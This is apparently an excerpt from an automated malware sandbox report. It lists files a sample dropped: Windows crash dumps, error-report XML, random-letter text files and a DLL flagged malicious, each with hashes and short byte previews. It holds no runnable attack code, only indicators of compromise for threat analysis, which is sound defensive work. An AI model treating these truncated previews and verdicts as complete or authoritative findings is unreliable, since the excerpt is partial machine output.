                                                                                                                                                      Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Apr 27 00:20:49 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):51594
                                                                                                                                                      Entropy (8bit):2.8620815512379076
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:EbqrL0yi17196lw9K0WE1nVlMrxkhLm3/88aNWyG:kGLnCDaw9ME1nVAxkhM/8pFG
                                                                                                                                                      MD5:E2BCC04F38675E4C93FD76149F63E659
                                                                                                                                                      SHA1:78764FC35CFCFE4330AD05A3F6AA611BA8BC3A35
                                                                                                                                                      SHA-256:C06352A9F432D42D3E1196D6FB479879BCEC833825EECFB35ACBD5A5D8199269
                                                                                                                                                      SHA-512:FC8CBF0A3C341F94DA2884CCD26A9767D13231FD68250FCC438B0EE9CFAD78D3EFFF6B409DBB153FFE129F0163C1C83A25A77FC0139A46FC42726769085B41EF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... ........D,f............4...........H...H............#...........A..........`.......8...........T............9...............)...........+..............................................................................eJ...... ,......GenuineIntel............T...........oD,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8340
                                                                                                                                                      Entropy (8bit):3.6982213073557104
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJfn6d6Y9bSUdbgmfa3pDA89bAQsf7gm:R6lXJv6d6YRSUdbgmfavAjfZ
                                                                                                                                                      MD5:AA610E6AB82978A1B7069D6D30E529D6
                                                                                                                                                      SHA1:A4F19D8CD2D6C2DE8D41A2561A0BA0E63084DAD9
                                                                                                                                                      SHA-256:3C9A720AEBDD562C6447297FCB460CC879D3E15CB131632D5ED93DE93159C510
                                                                                                                                                      SHA-512:CD590EACE7919E62946581EB66564C0CED379059E1CDD4A3DF54BB9EF608519213B560315F08BB0809F22F9D524A17D605BD4F90BBA3B25F421D70ADF57FB018
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.1.2.<./.P.i.
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4579
                                                                                                                                                      Entropy (8bit):4.461861086165045
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsaNJg77aI98nWpW8VYlwYm8M4JqbFg+q8sWt/o0GMd:uIjfeI7qW7VyJdst/9GMd
                                                                                                                                                      MD5:5DAF6534875B3C12A2F7F4291FB6297F
                                                                                                                                                      SHA1:82CC66F040D70E50C36C91C2AEC96AB6350A32BD
                                                                                                                                                      SHA-256:5A1697755E081C951BAF19E89DDC1994413F04D4D6FE2D9DD8B76D0CB9CE4604
                                                                                                                                                      SHA-512:695952FFB7D735D83A1B966634E888E45830AC4C366471C7278810194AB1D19E9F6EFE10A2E2CF243617210B3735E3A95144431F064AE2DA5EE104E37A00637E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Apr 27 00:20:55 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):62506
                                                                                                                                                      Entropy (8bit):2.7252612363808746
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:BqZGFwFZOgEUIEdMY+5nbjpXAxYX+3ofxFy:HFw+gEvbYGn3pXqY7xF
                                                                                                                                                      MD5:B550581A037E40835023FE7E64FB337D
                                                                                                                                                      SHA1:4F83F9F47D089962C3E08D83DAEA723408E1BE46
                                                                                                                                                      SHA-256:B394D7655CE3E47867DFBA0DA50DD0D9A62A6BD5D300CED9F505878EA7623E15
                                                                                                                                                      SHA-512:7A4FD2E11179239430D99E2ECA7249EE58454C79F4E7C9C0280F1EE5343923039179711BA5E887419BA710791142D596012A742F9AD4D562EA912E30B0347211
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... ........D,f............4............ ..<...........v9..........T.......8...........T............[..*...........((...........*..............................................................................eJ.......*......GenuineIntel............T...........tD,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8328
                                                                                                                                                      Entropy (8bit):3.696608315443663
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJOq6fx6YfG61gmfsGpDG89b9bsfp5Svfm:R6lXJj6fx6Y+61gmfsU9gfpF
                                                                                                                                                      MD5:5F87D5EAFB8FDEC8315D380DE36CB063
                                                                                                                                                      SHA1:059304F22F13A9CF9914363490BD65485B285EA7
                                                                                                                                                      SHA-256:0CA872919D1C9A5FA2C2A8D92296E4F6F48385BD760570EDC37C79E855B2796C
                                                                                                                                                      SHA-512:A8396ADBB34035820E47510F85E988323573C2ADB760F7931AB229A92C7F20E9EF83DAFF333FD5D57F1E786E091CC7E124CF6B4F288DECE19B867881BFB2C957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4551
                                                                                                                                                      Entropy (8bit):4.434336293524435
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsaNJg77aI98nWpW8VYuYm8M4JNmHoF2r+q8vMTcq8E9d:uIjfeI7qW7VqJOribE9d
                                                                                                                                                      MD5:ADBC0383EFE7FCC6DAC72CF4FFF9C7E7
                                                                                                                                                      SHA1:DF9E21C0F96B53194C8C5E1DB81B3A69C87D7913
                                                                                                                                                      SHA-256:F190791D0CD3BF046AEB0DC9CCD6CC20CF7218A6397324D6ACF89705E829F805
                                                                                                                                                      SHA-512:64A6634E5E944265B37AAA46D3B73D642885B95D9B2D749FE5CF80417725275F6832A66B5ED54E4F185A81930AB20ACE08BC1A18A207F954D47F67921AB07678
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.696724055101702
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.696250160603532
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                      MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                      SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                      SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                      SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.695685570184741
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                      MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                      SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                      SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                      SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1026
                                                                                                                                                      Entropy (8bit):4.700014595314478
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                      MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                      SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                      SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                      SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):685392
                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: VucRf0jboS.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: kO1P1YnLst.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: wxfSIz4PAi.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.3.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):173
                                                                                                                                                      Entropy (8bit):5.159332313104969
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:qRTW1R03Yi0qQCfkMP2D0TcLEtRNGcSZeE34LovqTW1R5JMIcLlilYFxOv:qlf0TCfk3VotGjZb34L2/Qiloe
                                                                                                                                                      MD5:2DCF1B7A7BAD97A444B7C78A1AAAD58D
                                                                                                                                                      SHA1:1A983522C62DB1E2D36324408893002CE1A9FEB3
                                                                                                                                                      SHA-256:3F8EA5A58BDFF625A07ADC53AC17E3DF81F6767038828BF761F0B96057523A75
                                                                                                                                                      SHA-512:7350A3D12E81D5F256FFB777C1BC013833DC6EB5E34CD399C83373F4A3797FBE6104EBBF26E2407FA4E7B789D43DB7A82B38F23A46B108BCEE15748D4BA8052A
                                                                                                                                                      Malicious:false
